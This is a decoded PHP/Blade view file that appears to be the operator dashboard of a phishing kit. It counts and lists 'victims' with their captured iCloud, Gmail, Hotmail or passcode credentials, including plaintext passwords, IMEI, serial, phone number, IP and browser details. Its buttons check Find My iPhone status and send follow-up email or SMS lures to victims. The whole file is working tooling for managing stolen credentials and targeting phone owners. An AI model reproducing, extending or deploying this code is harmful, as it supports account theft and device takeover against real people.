<?php
/**
 * @ PHP 5.6
 * @ Decoder version : 1.0.0.4
 * @ Release on : 24.03.2018
 * @ Website    : http://EasyToYou.eu
 *
 * @ Zend guard decoder PHP 5.6
 **/

echo '@extends(\'assets.backend.default\')' . "\n\n" . '{{--*/ $ci =& get_instance(); /*--}}' . "\n\n" . '@push(\'extrajs\')' . "\n" . '    <!-- FooTable -->' . "\n" . '    <script src="{{site_url(\'assets/js/ajax-form.js\')}}"></script>' . "\n" . '    <script src="{{site_url(\'assets/backend/js/plugins/footable/footable.all.min.js\')}}"></script>' . "\n" . '    <!-- Page-Level Scripts -->' . "\n" . '    <script>' . "\n" . '        $(document).ready(function () {' . "\n" . '            $(\'.footable\').footable();' . "\n\n" . '            function swl(title, text, type) {' . "\n" . '                swal({' . "\n" . '                    title: title,' . "\n" . '                    text: text,' . "\n" . '                    type: type,' . "\n" . '                    showCancelButton: false,' . "\n" . '                    closeOnConfirm: true,' . "\n" . '                    html: true,' . "\n" . '                    allowOutsideClick: true,' . "\n\n" . '                });' . "\n" . '            }' . "\n\n" . '            $(\'.fmionoff\').on(\'click\', function () {' . "\n" . '                var thiss = $(this),' . "\n" . '                    request = $(this).attr(\'data-link\'),' . "\n" . '                    imei = $(this).attr(\'data-imei\');' . "\n\n" . '                thiss.html(\'<i class="fa fa-spin fa-spinner"></i>\');' . "\n\n" . '                $.ajax({' . "\n" . '                    cache: false,' . "\n" . '                    type: "GET",' . "\n" . '                    timeout: 5000,' . "\n" . '                    url: request + imei,' . "\n\n" . '                    success: function (res) {' . "\n" . '                        console.log(res);' . "\n" . '                        if (res.success) {' . "\n" . '                            swl(\'Well!\', res.message, \'success\');' . "\n" . '                            thiss.html(\'<i class="fab fa-apple"></i>\');' . "\n" . '                        } else {' . "\n" . '                            swl(\'Error!\', res.error, \'error\');' . "\n" . '                            thiss.html(\'<i class="fab fa-apple"></i>\');' . "\n" . '                        }' . "\n" . '                    },' . "\n" . '                    error: function () {' . "\n" . '                        swl(\'Error!\', \'Something goes wrong try again :(\', \'error\');' . "\n" . '                        return false;' . "\n" . '                    }' . "\n" . '                });' . "\n" . '            });' . "\n" . '        });' . "\n" . '    </script>' . "\n" . '    <!-- Sweet alert -->' . "\n\n" . '    <script src="{{site_url(\'assets/backend/js/plugins/ladda/spin.min.js\')}}"></script>' . "\n" . '    <script src="{{site_url(\'assets/backend/js/plugins/ladda/ladda.min.js\')}}"></script>' . "\n" . '    <script src="{{site_url(\'assets/backend/js/plugins/ladda/ladda.jquery.min.js\')}}"></script>' . "\n" . '@endpush' . "\n\n" . '@push(\'extracss\')' . "\n" . '    <link href="{{site_url(\'assets/backend/css/plugins/ladda/ladda-themeless.min.css\')}}" rel="stylesheet">' . "\n" . '    <!-- FooTable -->' . "\n" . '    <link href="{{site_url(\'assets/backend/css/plugins/footable/footable.core.css\')}}" rel="stylesheet">' . "\n" . '    <link href="{{site_url(\'assets/backend/css/plugins/sweetalert/sweetalert.css\')}}" rel="stylesheet">' . "\n" . '    <style>' . "\n" . '        .table > tbody > tr > td, .table > tbody > tr > th, .table > tfoot > tr > td, .table > tfoot > tr > th, .table > thead > tr > td, .table > thead > tr > th {' . "\n" . '            border-top: 1px solid #d0d0d0 !important;' . "\n" . '        }' . "\n" . '    </style>' . "\n" . '@endpush' . "\n\n" . '@section(\'content\')' . "\n" . '    <div class="row">' . "\n\n" . '        <div class="col-xs-12">' . "\n" . '            ';

if ($ci->session->flashdata('success')) {
	echo '            <div class="alert alert-success">' . "\n" . '                ';
	echo $ci->session->flashdata('success');
	echo '            </div>' . "\n" . '            ';
}

echo "\n" . '            ';

if ($ci->session->flashdata('error')) {
	echo '            <div class="alert alert-danger">' . "\n" . '                ';
	echo $ci->session->flashdata('error');
	echo '            </div>' . "\n" . '            ';
}

echo '        </div>' . "\n\n" . '        <div class="col-lg-3">' . "\n" . '            <div class="widget style1 navy-bg">' . "\n" . '                <div class="row">' . "\n" . '                    <div class="col-xs-4">' . "\n" . '                        <i class="fa fa-user fa-5x"></i>' . "\n" . '                    </div>' . "\n" . '                    <div class="col-xs-8 text-right">' . "\n" . '                        <span> {{ $ci->lang->line(\'Howmanyvictim_message\') }} </span>' . "\n" . '                        <h2 class="font-bold">{{ count($victimList) }}' . "\n" . '                            <small style="color: #fff">{{ $ci->lang->line(\'Victim_message\') }}</small>' . "\n" . '                        </h2>' . "\n" . '                    </div>' . "\n" . '                </div>' . "\n" . '            </div>' . "\n" . '        </div>' . "\n" . '        <div class="col-lg-3">' . "\n" . '            <div class="widget style1 navy-bg">' . "\n" . '                <div class="row">' . "\n" . '                    <div class="col-xs-4">' . "\n" . '                        <i class="fa fa-desktop fa-5x"></i>' . "\n" . '                    </div>' . "\n" . '                    <div class="col-xs-8 text-right">' . "\n" . '                        <span> How Many Device </span>' . "\n" . '                        <h2 class="font-bold">{{ $device }}' . "\n" . '                            <small style="color: #fff">Device</small>' . "\n" . '                        </h2>' . "\n" . '                    </div>' . "\n" . '                </div>' . "\n" . '            </div>' . "\n" . '        </div>' . "\n" . '        <div class="col-lg-3">' . "\n" . '            <div class="widget style1 navy-bg">' . "\n" . '                <div class="row">' . "\n" . '                    <div class="col-xs-4">' . "\n" . '                        <i class="fa fa-mobile fa-5x"></i>' . "\n" . '                    </div>' . "\n" . '                    <div class="col-xs-8 text-right">' . "\n" . '                        <span> {{ $ci->lang->line(\'HowManyIOS_message\') }} </span>' . "\n" . '                        <h2 class="font-bold">{{ $ios }}' . "\n" . '                            <small style="color: #fff">{{ $ci->lang->line(\'Device_message\') }}</small>' . "\n" . '                        </h2>' . "\n" . '                    </div>' . "\n" . '                </div>' . "\n" . '            </div>' . "\n" . '        </div>' . "\n" . '        <div class="col-lg-3">' . "\n" . '            <div class="widget style1 navy-bg">' . "\n" . '                <div class="row">' . "\n" . '                    <div class="col-xs-4">' . "\n" . '                        <i class="fa fa-laptop fa-5x"></i>' . "\n" . '                    </div>' . "\n" . '                    <div class="col-xs-8 text-right">' . "\n" . '                        <span> {{ $ci->lang->line(\'HowManyOSX_message\') }} </span>' . "\n" . '                        <h2 class="font-bold">{{ $osx }}' . "\n" . '                            <small style="color: #fff">{{ $ci->lang->line(\'Device_message\') }}</small>' . "\n" . '                        </h2>' . "\n" . '                    </div>' . "\n" . '                </div>' . "\n" . '            </div>' . "\n" . '        </div>' . "\n\n" . '        <!-- /.clearfix -->' . "\n\n" . '        <div class="col-lg-12" style="margin-top: 30px">' . "\n" . '            <div class="ibox float-e-margins">' . "\n" . '                <div class="ibox-title">' . "\n" . '                    <h5>Showing all user have been {{str_replace(\'victimList\', \'\', $title)}}, <span' . "\n" . '                                class="badge">{{count($victimList)}}</span> record have been found</h5>' . "\n\n" . '                    <div class="ibox-tools">' . "\n" . '                        <a class="collapse-link">' . "\n" . '                            <i class="fa fa-chevron-up"></i>' . "\n" . '                        </a>' . "\n" . '                        <a class="close-link">' . "\n" . '                            <i class="fa fa-times"></i>' . "\n" . '                        </a>' . "\n" . '                    </div>' . "\n" . '                </div>' . "\n" . '                <div class="ibox-content">' . "\n" . '                    <input type="text" class="form-control input-sm m-b-xs" id="filter"' . "\n" . '                           placeholder="Search in table">' . "\n" . '                    <table class="footable table table-stripped toggle-plus" data-page-size="20" data-filter=#filter>' . "\n" . '                        <thead>' . "\n" . '                        <tr>' . "\n" . '                            <th data-toggle="true" data-hide="phone">IMEI</th>' . "\n" . '                            <th data-hide="phone"> Email</th>' . "\n" . '                            <th data-hide="phone">Name</th>' . "\n" . '                            <th data-hide="all">Time Created</th>' . "\n" . '                            <th>Status</th>' . "\n" . '                            <th>Type</th>' . "\n" . '                            <th>Logged Count</th>' . "\n" . '                            <th data-hide="all">Password</th>' . "\n" . '                            <th data-hide="all">Model</th>' . "\n" . '                            <th data-hide="all">Serial</th>' . "\n" . '                            <th data-hide="all">Phone</th>' . "\n" . '                            <th data-hide="all">IP</th>' . "\n" . '                            <th data-hide="all">Browser</th>' . "\n" . '                            <th data-hide="all">Platform</th>' . "\n" . '                            <th data-hide="all">User Agent</th>' . "\n" . '                            <th data-hide="all">Time Logged</th>' . "\n" . '                            <th data-hide="all">Note</th>' . "\n" . '                            <th class="text-center">Action</th>' . "\n" . '                        </tr>' . "\n" . '                        </thead>' . "\n" . '                        <tbody>' . "\n" . '                        @foreach($victimList as $victim)' . "\n" . '                            <tr style="border-bottom: 1px #eee solid !important;" {!!  ($victim->done == 1) ? \'class="success"\' : \'class="warning"\' !!}>' . "\n" . '                                <td>@if($victim->done != 1) <i class="fa fa-clock-o text-warning"></i> @else <i' . "\n" . '                                            class="fa fa-check text-info"></i> @endif<span' . "\n" . '                                            class="badge info-bg">{{$victim->imei or \'Not Provided\'}}</span>' . "\n" . '                                </td>' . "\n" . '                                @if(empty($victim->email) && !empty($victim->imei))' . "\n" . '                                    <td><a class="btn btn-link"' . "\n" . '                                           href="{{site_url(ADMINPATH.\'victims/details/\'.$victim->id.\'/\'.$victim->email)}}">{{$victim->imei}}</a>' . "\n" . '                                    </td>' . "\n" . '                                @else' . "\n" . '                                    <td><a class="btn btn-link"' . "\n" . '                                           href="{{site_url(ADMINPATH.\'victims/details/\'.$victim->id.\'/\'.$victim->email)}}">{{$victim->email}}</a>' . "\n" . '                                    </td>' . "\n" . '                                @endif' . "\n\n" . '                                <td>{{$victim->name or \'Still Waiting\'}}</td>' . "\n" . '                                <td>{{getTime($victim->timestamp, \'D, j M Y - h:i:s a\')}}</td>' . "\n" . '                                <td>{!! ($victim->done == 1) ? \'<span class="badge navy-bg">Completed :)</span>\': \'<span class="badge yellow-bg">Still Pending</span>\' !!}</td>' . "\n" . '                                <td>' . "\n" . '                                    {!! ($victim->type == \'iCloud\') ? \'<span class="badge" style="background-color: #37a8f4; color: #fff;" data-toggle="tooltip" data-placement="top" title="iCloud"><i class="fab fa-apple"></i></span>\': \'\' !!}' . "\n" . '                                    {!! ($victim->type == \'Gmail\') ? \'<span class="badge" style="background-color: #ea4335; color: #fff;" data-toggle="tooltip" data-placement="top" title="Gmail"><i class="fab fa-google"></i></span>\': \'\' !!}' . "\n" . '                                    {!! ($victim->type == \'Hotmail\') ? \'<span class="badge" style="background-color: #ffb900; color: #fff;" data-toggle="tooltip" data-placement="top" title="MicroSoft"><i class="fab fa-windows"></i></span>\': \'\' !!}' . "\n" . '                                    {!! ($victim->type == \'Passcode\') ? \'<span class="badge" style="background-color: #222; color: #fff;" data-toggle="tooltip" data-placement="top" title="PassCode"><i class="fa fa-lock"></i></span>\': \'\' !!}' . "\n" . '                                </td>' . "\n" . '                                {{--*/ $howMany = $ci->victim->getVLog($victim->id); /*--}}' . "\n" . '                                @if ( $howMany )' . "\n" . '                                    {{--*/ $many = \'<a class="btn btn-xs btn-info" href="\'.site_url(\'admin/victims/loggedLogs/\' . $victim->id.\'/\'. $victim->email).\'"><span class="badge">\' . count($howMany) . \'</span> time\\\'s </a>\'; /*--}}' . "\n" . '                                @else' . "\n" . '                                    {{--*/ $many = \'<i style="font-size: 20px;" class="fa fa-times"></i>\';/*--}}' . "\n" . '                                @endif' . "\n" . '                                <td class="text-center">{!! $many !!}</td>' . "\n" . '                                <td>{{$victim->pass or \'Still Waiting\'}}</td>' . "\n" . '                                @if($victim->type == \'iCloud\')' . "\n\n" . '                                    <td><span class="badge info-bg">{{$victim->model or \'Not Provided\'}}</span></td>' . "\n" . '                                    <td><span class="badge info-bg">{{$victim->serial or \'Not Provided\'}}</span></td>' . "\n" . '                                    <td><span class="badge info-bg">{{$victim->phone or \'Not Provided\'}}</span></td>' . "\n" . '                                @else' . "\n\n" . '                                    <td></td>' . "\n" . '                                    <td></td>' . "\n" . '                                    <td></td>' . "\n" . '                                @endif' . "\n" . '                                <td>{{$victim->ip or \'Still Waiting\'}}</td>' . "\n" . '                                <td>{{$victim->browser or \'Still Waiting\'}}</td>' . "\n" . '                                <td>{{$victim->platform or \'Still Waiting\'}}</td>' . "\n" . '                                <td>{{$victim->agent_string or \'Still Waiting\'}}</td>' . "\n" . '                                <td>{{is_null($victim->time_logged) ? \'Still Waiting\' : getTime($victim->time_logged, \'D, j M Y - h:i:s a\') }}</td>' . "\n" . '                                <td>{{$victim->note or \'Not Provided\'}}</td>' . "\n" . '                                <td class="text-center">' . "\n\n" . '                                    <a data-toggle="tooltip" data-placement="top"' . "\n" . '                                       title="{{$ci->lang->line(\'ViewMoreDetails_message\')}}"' . "\n" . '                                       href="{{site_url(ADMINPATH.\'victims/details/\'.$victim->id.\'/\'.$victim->email)}}"' . "\n" . '                                       class="btn btn-default btn-xs"><i class="fa fa-eye"></i></a>' . "\n\n" . '                                    @if (empty($victim->imei))' . "\n" . '                                    <a data-toggle="tooltip" data-placement="top" title="Check FMI on/off"' . "\n" . '                                       disabled="true" readonly="true"' . "\n" . '                                       class="btn btn-info btn-xs"><i class="fab fa-apple"></i></a>' . "\n" . '                                    @else' . "\n" . '                                        <a data-toggle="tooltip" data-imei="{{$victim->imei}}" data-link="{{site_url(ADMINPATH.\'API/fmionoff/\')}}" data-placement="top" title="Check FMI on/off"' . "\n" . '                                           class="btn btn-success btn-xs fmionoff"><i class="fab fa-apple"></i></a>' . "\n" . '                                    @endif' . "\n" . '                                    @if ( $victim->done == 1)' . "\n" . '                                        <a data-toggle="tooltip" data-placement="top" title="Send Email Now"' . "\n" . '                                           disabled="true" readonly="true"' . "\n" . '                                           class="btn btn-info btn-xs"><i class="fa fa-envelope"></i></a>' . "\n" . '                                        <a data-toggle="tooltip" data-placement="top" title="Send SMS Now"' . "\n" . '                                           disabled="true" readonly="true"' . "\n" . '                                           class="btn btn-info btn-xs"><i class="fa fa-phone fa-1x"></i></a>' . "\n" . '                                    @else' . "\n" . '                                        <a data-toggle="tooltip" data-placement="top" title="Send Email Now"' . "\n" . '                                           href="{{site_url(ADMINPATH.\'mails/newMail/?email=\' . $victim->email . \'&name=\' . $victim->name)}}"' . "\n" . '                                           class="btn btn-info btn-xs"><i class="fa fa-envelope"></i></a>' . "\n" . '                                        <a data-toggle="tooltip" data-placement="top" title="Send SMS Now"' . "\n" . '                                           href="{{site_url(ADMINPATH.\'sms/send/?phone=\' . $victim->phone . \'&name=\' . $victim->name)}}"' . "\n" . '                                           class="btn btn-info btn-xs"><i class="fa fa-phone fa-1x"></i></a>' . "\n" . '                                    @endif' . "\n" . '                                    <a data-toggle="tooltip" data-placement="top"' . "\n" . '                                       title="{{$ci->lang->line(\'Deletethisvictim_message\')}}" data-id="{{$victim->id}}"' . "\n" . '                                       data-url="{{site_url(ADMINPATH.\'victims/delVic\')}}"' . "\n" . '                                       class="removeVic btn btn-danger btn-xs"><i class="fa fa-trash"></i></a>' . "\n\n\n" . '                                    <a @if($victim->done != 1) disabled="disabled" readonly="readonly"' . "\n" . '                                       @endif class="@if($victim->done == 1) blockd-ajax @endif btn-danger btn btn-xs"' . "\n" . '                                       data-url="{{site_url(ADMINPATH.\'banned/block/\')}}" data-ip="{{$victim->ip}}"' . "\n" . '                                       data-toggle="tooltip" data-placement="top" title="{{$victim->ip}}"><i' . "\n" . '                                                class="fa fa-times-circle-o"></i> <span>Block</span></a>' . "\n\n" . '                                </td>' . "\n" . '                            </tr>' . "\n" . '                        @endforeach' . "\n" . '                        </tbody>' . "\n" . '                        <tfoot>' . "\n" . '                        <tr>' . "\n" . '                            <td colspan="5">' . "\n" . '                                <ul class="pagination pull-right"></ul>' . "\n" . '                            </td>' . "\n" . '                        </tr>' . "\n" . '                        </tfoot>' . "\n" . '                    </table>' . "\n\n" . '                </div>' . "\n" . '            </div>' . "\n" . '        </div>' . "\n" . '    </div>' . "\n" . '    <!-- /.row -->' . "\n" . '@endsection';

?>
